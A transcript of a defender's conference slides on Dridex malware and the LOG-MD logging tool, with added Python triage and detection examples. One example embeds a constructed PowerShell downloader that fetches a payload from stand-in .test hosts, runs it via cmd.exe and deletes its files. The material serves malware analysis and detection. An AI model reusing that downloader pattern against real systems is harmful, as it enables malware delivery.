1. Commodity malware means YOU!
And everybody in this room. Let’s look at one called Dridex
Michael Gough – Founder
MalwareArchaeology.com
2. Who am I
• Blue Team Defender Ninja, Malware Archaeologist, Logoholic
• I love “properly” configured logs – they tell us Who, What, Where,
When and hopefully How
Creator of
“Windows Logging Cheat Sheet”
“Windows PowerShell Logging Cheat Sheet”
“Windows Splunk Logging Cheat Sheet”
“Malware Management Framework”
• Co-Creator of “Log-MD” – Log Malicious Discovery Tool
– With @Boettcherpwned – Brakeing Down Security PodCast
• @HackerHurricane also my Blog
3. Goal
• Interaction – Don’t be a Ding Dong, ask a
question… you WILL be rewarded for positive
synergy!
• Learn how we Ninjas do it so you can too
• We have a NEW Tool for YOU!!!
9. Top 8 threats
• These are what we see most
• What all of YOU see most
• The 20% of what AV focuses on
• We can learn a lot from this
10. Dridex movin’ on up
Source: Mandiant M-Trends 2016 Report
11. More of the same
According to Check Point’s ThreatCloud in 2015…
• 3000 different malware ‘families’
• 80% have been active for years, some for 8 years
• Of the Top 100, which accounted for 90% of all attacks in 2015, only 3 were new, and those were outside the Top 40
• More proof Malware Management works
13. Sophos Says…
• 70% of malware is unique to 1 company (APT)
• 80% of malware is unique to 10 or fewer companies (APT)
• That means…
• 20% of malware is what the AV industry focuses on, but it is what most of you and everyone in this room see and get via:
– Attachments in email
– URLs in email
– Surfing the web
• Ads
• WordPress, Drupal, Joomla…
14. Types of Malware
I say there are basically two types of malware:
• Commodity malware – The 20% the AV
industry focuses on
• Advanced malware – The 80% that the AV
industry does not focus on and “may” get
around to IF you force them by being a client
or if they have multiple customers that receive
it in a particular industry (e.g. retail PoS)
15. Commodity malware
• This is the stuff you and everyone in the room
gets and sees, your family, friends and clients
too
• Emails, URLs, web surfing
• Most is Commodity malware
• Pwned Ad networks
• Some will be NEW
• Some will be APT
16. VirusTotal
• Commodity malware will be detected within a
few days
• APT… not so much
• I still have samples from 2012 that have ZERO
detection ;-(
• And I gave 12 AV companies a copy of it
• Shows how much they care about APT
17. Malware evolves
• So must we
• Darwin says so
• Evolve or die
• Well… Evolve or get breached anyways
• Which means an RGE !!!
– Resume Generating Event
18. Before Dridex
• Zeus – 2007
– SpyEye evolved from Zeus
– Bugat/Cridex evolved from Zeus
– Gameover Zeus taken down in 2014
• Bugat & Cridex – 2012
• Dridex – Late 2014
– Generated 15,000 emails daily
• C2 Servers taken down Dec 2015
• Now we have Locky
25. Dridex
• We have probably all seen one of these
• Did I say Commodity Malware?
• Uses Word documents with macros that are hard for email gateways to detect
• Yes, users have to “Enable Macros”, but they would NEVER do that…
26. Commodity Malware
Smarter than ever
• In 2015 I have witnessed things with
commodity malware usually reserved for APT
– Because they are evolving from APT
• More use of scripts to avoid AV detection
• More use of PowerShell backdoors!
• More stealthy persistence
32. Dridex Artifacts – .PS1
• Domains to phone home to
• Path – %temp%
33. Dridex Artifacts – .PS1 (continued)
• 8 characters + .exe – Payload name
• 444.jpg – Stats file (example shown on the slide)
• User Agent to emulate a browser
• Download the files
• Assemble the names: .vbs, .jpg, .bat, .PS1
• Sleep 15
• Execute the payload – cmd.exe %file%
• Remove the files
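To show how a responder turns a dropped script with the structure listed on slides 32 and 33 into indicators, here is an added Python example. It is not the speaker’s tooling and not a real Dridex sample: the downloader text it parses is constructed to mirror the structure above (phone-home domains, %temp% path, 8-character + .exe payload, stats file, browser user agent, download, sleep, cmd.exe execution, cleanup), the `.test` domains are reserved names that resolve nowhere, and the regular expressions are my own assumptions about how such a script is written.

```python
"""Triage a PowerShell downloader of the shape described on the slides.

Added example, not code from the talk. SAMPLE_PS1 is a CONSTRUCTED stand-in
that mirrors the listed structure; it is not a real sample.
"""
import re

SAMPLE_PS1 = r'''
$d = @("example-one.test", "example-two.test")
$t = $env:TEMP
$n = "abcdefgh.exe"
$ua = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0"
$wc = New-Object System.Net.WebClient
$wc.Headers.Add("User-Agent", $ua)
foreach ($h in $d) {
  try { $wc.DownloadFile("http://$h/444.jpg", "$t\444.jpg"); break } catch {}
}
$wc.DownloadFile("http://$($d[0])/$n", "$t\$n")
Start-Sleep -s 15
cmd.exe /c "$t\$n"
Remove-Item "$t\444.jpg", "$t\$n", "$t\run.bat", "$t\run.vbs"
'''

# Quoted strings that look like hosts but are really file names (assumption:
# the extensions the slides list plus a couple of common ones).
FILE_EXTS = {"exe", "jpg", "vbs", "bat", "ps1", "dll", "txt"}

QUOTED_HOST_RE = re.compile(r'"([a-z0-9-]+(?:\.[a-z0-9-]+)*\.[a-z]{2,})"', re.I)
USER_AGENT_RE = re.compile(r'"(Mozilla/[^"]+)"')
DROPPED_FILE_RE = re.compile(r'\\([\w-]+\.(?:exe|jpg|vbs|bat|ps1))\b', re.I)
PAYLOAD_RE = re.compile(r'\b([a-z0-9]{8}\.exe)\b', re.I)      # "8 + .exe"
SLEEP_RE = re.compile(r'Start-Sleep\s+-s(?:econds)?\s+(\d+)', re.I)
CMD_EXEC_RE = re.compile(r'\bcmd(?:\.exe)?\s+/c\b', re.I)
CLEANUP_RE = re.compile(r'\bRemove-Item\b|\bdel\b', re.I)
TEMP_RE = re.compile(r'\$env:TEMP\b|%temp%', re.I)


def extract_iocs(text: str) -> dict:
    """Pull the artifacts a responder needs out of the script text."""
    hosts = {h.lower() for h in QUOTED_HOST_RE.findall(text)}
    ua = USER_AGENT_RE.search(text)
    sleep = SLEEP_RE.search(text)
    return {
        "domains": sorted(h for h in hosts if h.rsplit(".", 1)[-1] not in FILE_EXTS),
        "user_agent": ua.group(1) if ua else None,
        "payloads": sorted({p.lower() for p in PAYLOAD_RE.findall(text)}),
        "dropped": sorted({d.lower() for d in DROPPED_FILE_RE.findall(text)}),
        "uses_temp": bool(TEMP_RE.search(text)),
        "sleep_seconds": int(sleep.group(1)) if sleep else None,
        "executes_via_cmd": bool(CMD_EXEC_RE.search(text)),
        "cleans_up": bool(CLEANUP_RE.search(text)),
    }


# The traits the slides list; a script hitting all of them is a strong match.
TRAITS = [
    ("phone-home domains", lambda i: bool(i["domains"])),
    ("browser user agent", lambda i: i["user_agent"] is not None),
    ("8-character .exe payload", lambda i: bool(i["payloads"])),
    ("stages files in %temp%", lambda i: i["uses_temp"]),
    ("sleeps before running", lambda i: i["sleep_seconds"] is not None),
    ("runs payload via cmd.exe", lambda i: i["executes_via_cmd"]),
    ("deletes its files", lambda i: i["cleans_up"]),
]


def matched_traits(iocs: dict) -> list:
    return [name for name, check in TRAITS if check(iocs)]


if __name__ == "__main__":
    found = extract_iocs(SAMPLE_PS1)
    for key, value in found.items():
        print(f"{key:18} {value}")
    print("traits matched:", matched_traits(found))
```

The domains and the dropped file names are what goes into log management and the whitelist review afterwards; the trait count is only a triage aid, so a script that hits most of them is worth detonating in the lab rather than being dismissed on the strength of a clean AV verdict.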
34. VM Aware… What do I say?
• Use bare metal to do analysis
35. Persistence
• New method towards the end of 2015
• Nothing in the Registry showing persistence while the system was running
• In memory only until system shutdown
• Then we caught the bugger, with good auditing of course and
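An added Python example of the kind of check that catches persistence written only at shutdown (not the speaker’s method and not LOG-MD code). The slide does not say which registry location was used, so this assumes the write lands in a Run/RunOnce key, that a SACL on those keys produces Security event 4657 (“A registry value was modified”), and that System event 1074 marks shutdown initiation; the event timeline is constructed, not real log data.

```python
"""Correlate autorun registry writes with shutdown.

Added example, not code from the talk. EVENTS is a CONSTRUCTED timeline;
the Run/RunOnce location, event 4657 via a registry SACL and event 1074 for
shutdown initiation are assumptions, since the slide names none of them.
"""
from datetime import datetime, timedelta

AUTORUN_KEYS = (
    r"\software\microsoft\windows\currentversion\run",
    r"\software\microsoft\windows\currentversion\runonce",
)

EVENTS = [  # constructed, not real
    {"time": "2016-03-01 09:12:04", "id": 4657,
     "object": r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
     "value": "VendorTray", "data": r"C:\Program Files\Vendor\tray.exe",
     "process": r"C:\Windows\System32\msiexec.exe"},
    {"time": "2016-03-01 13:40:19", "id": 4657,
     "object": r"\REGISTRY\USER\S-1-5-21-1-2-3-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced",
     "value": "Hidden", "data": "1", "process": r"C:\Windows\explorer.exe"},
    {"time": "2016-03-01 17:30:11", "id": 1074,
     "process": r"C:\Windows\System32\winlogon.exe", "reason": "shutdown"},
    {"time": "2016-03-01 17:30:14", "id": 4657,
     "object": r"\REGISTRY\USER\S-1-5-21-1-2-3-1001\Software\Microsoft\Windows\CurrentVersion\Run",
     "value": "Update", "data": r"C:\Users\user\AppData\Roaming\Update\update.exe",
     "process": r"C:\Users\user\AppData\Roaming\Update\update.exe"},
]


def parse_ts(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


def is_autorun_key(object_name: str) -> bool:
    name = object_name.lower()
    return any(name.endswith(k) for k in AUTORUN_KEYS)


def autorun_writes(events) -> list:
    """Every audited write to an autorun key, whenever it happened."""
    return [e for e in events if e["id"] == 4657 and is_autorun_key(e["object"])]


def find_shutdown_persistence(events, before=timedelta(seconds=5),
                              after=timedelta(seconds=120)) -> list:
    """Autorun writes landing in the shutdown window (shortly before or
    within `after` of a 1074). A process that only writes its Run value
    here leaves nothing for a runtime registry scan to find, which is why
    the audit log, not a live scan, is what catches it."""
    shutdowns = [parse_ts(e["time"]) for e in events if e["id"] == 1074]
    findings = []
    for e in autorun_writes(events):
        t = parse_ts(e["time"])
        near = [s for s in shutdowns if -before <= t - s <= after]
        if near:
            findings.append({
                "time": e["time"], "key": e["object"], "value": e["value"],
                "data": e["data"], "process": e["process"],
                "seconds_after_shutdown": int((t - near[0]).total_seconds()),
            })
    return findings


if __name__ == "__main__":
    for f in find_shutdown_persistence(EVENTS):
        print(f"{f['time']}  {f['process']} wrote {f['value']} = {f['data']}"
              f" ({f['seconds_after_shutdown']}s after shutdown started)")
```

The daytime installer write to the same key is reported by `autorun_writes` but not by the shutdown correlation; that is the split a responder wants when the live system and the Autoruns-style tools came back clean.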
36. Malware Management
• Proof it works
• If you look at Zeus, Cridex and Dridex, you are
better prepared for Locky
• Learn from History
• Your defenses and detection MUST evolve too
• Read the malware analysis and breach reports
• Tweak your tools
• Focus on new kewl hooks and artifacts
37. How we harvested malware
• Yay Email!!!
• Since the primary delivery was Phishing, we were
able to grab copies of the Word documents
• Executed in the Lab
• Grabbed the artifacts
• Updated our Detection
• We knew if anyone fell for it and opened them
• We knew what to cleanup
38. How we harvested malware
• File Copy loop in Directories discovered (batch file, run from the directory you want to capture; it loops until you press Ctrl-C)
@echo off
cls
md Captured
:Redo
rem /E all subdirs, /B backup mode (needs admin), /R:0 /W:1 no retries,
rem /NP no progress output, /XO skip files older than the captured copy,
rem /XD do not recurse into the Captured folder itself
robocopy . Captured /E /B /R:0 /W:1 /NP /XO /XD Captured
goto Redo
:End
• Ninja Tip:
– Great to do in Labs for User space AppData
41. LOG-MD
• Log and Malicious Discovery tool
• When you run the tool, it tells you what
auditing and settings to configure that it
requires. LOG-MD won’t harvest anything
until you configure the system!
• Once the system and/or GPO is configured
1. Clear the logs
2. Infect the system
3. Run Log-MD
4. Review “Report.csv” in Excel
42. Functions
• Audit Report of log settings compared to:
– The “Windows Logging Cheat Sheet”
– Center for Internet Security (CIS) Benchmarks
– Also USGCB and AU ACSC
• White lists to filter out the known good
– By IP Address
– By Process Command Line and/or Process Name
– By File and Registry locations (requires File and
Registry auditing to be set)
• Report.csv - data from logs specific to security
43. Purpose
• Malware Analysis Lab
• Investigate a suspect system
• Audit Advanced Audit Policy settings
• Help MOVE or PUSH security forward
• Give the IR folks what they need and the Feds too
• Take a full system (File and Reg) snapshot to compare to another
system and report the differences
• Discover tricky malware artifacts
• SPEED !
• Deploy with anything you want, SCCM, LanDesk, PSExec, PS, etc…
• Replace several tools we use today with one easy to use utility that
does much more
• To answer the question: Is this system infected or clean?
• And do it quickly !
44. Free Edition
• Harvest security relevant log data
• Whitelist log events by IP, Cmd Line, Process
and File / Registry audit locations
• Perform a full File Baseline of a system
• Compare a suspect system to a Baseline or Dir
• Perform a full Registry snapshot of a system
• Compare a suspect system to a Reg Baseline
• Look for Large Registry Keys for hidden
payloads
45. LOG-MD Professional
• Everything the Free Edition does and…
• More reports, breakdown of things to look for
• Specify the Output directory
• Harvest Sysmon logs
• Harvest WLS Logs
• Whitelist Hash compare results
• Whitelist Registry compare results
• Create a Master-Digest to exclude unique files
• Free updates for 1 year, expect a new release
every quarter
• Manual – How to use LOG-MD Professional
46. Future Versions – In the works!
• WhoIs lookups of IP Addresses called
• VirusTotal lookups of discovered files
• Find parent-less processes
• Assess all processes and create a Whitelist
• Assess all services and create a Whitelist
• VirusTotal lookups of unknown or new processes
and services
• PowerShell details
• Other API calls to security vendors
51. Use the power of Excel
• The reports are in .CSV format
• Excel has sorting and Filters
• Filters are AWESOME to thin out your results
• You might take filtered results and add them
to your whitelist once vetted
• Save to .XLS and format, color code and
produce your report
• For .TXT files use Notepad++
52. So what do we get?
• WHAT Processes executed
• WHERE it executed from
• IP’s to enter into Log Management to see
WHO else opened the malware
• Details needed to remediate infection
• Details to improve your Active Defense!
• I did this in…
15 Minutes!
53. Resources
• Websites
– Log-MD.com The tool
• The “Windows Logging Cheat Sheet”
– MalwareArchaeology.com
• Malware Analysis Report links too
– To start your Malware Management program
• This presentation is on SlideShare
– Search for MalwareArchaeology or LOG-MD
54. Testers for RC-1
• May 1st 2016 - launch date
• Looking for a few good testers…
– of LOG-MD Professional
• Test the manual and tool and provide feedback
• You WILL be rewarded for the effort ;-)
• You heard it here first !
• A gift from your local Austin Security
Professionals
55. Questions?
You can find us at:
• Log-MD.com
• @HackerHurricane
• @Boettcherpwned
• MalwareArchaeology.com
• HackerHurricane.com (blog)
• http://www.slideshare.net – LinkedIn now